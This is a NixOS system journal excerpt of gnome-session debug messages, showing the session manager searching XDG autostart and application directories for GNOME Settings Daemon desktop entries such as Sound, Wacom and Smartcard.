machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop'
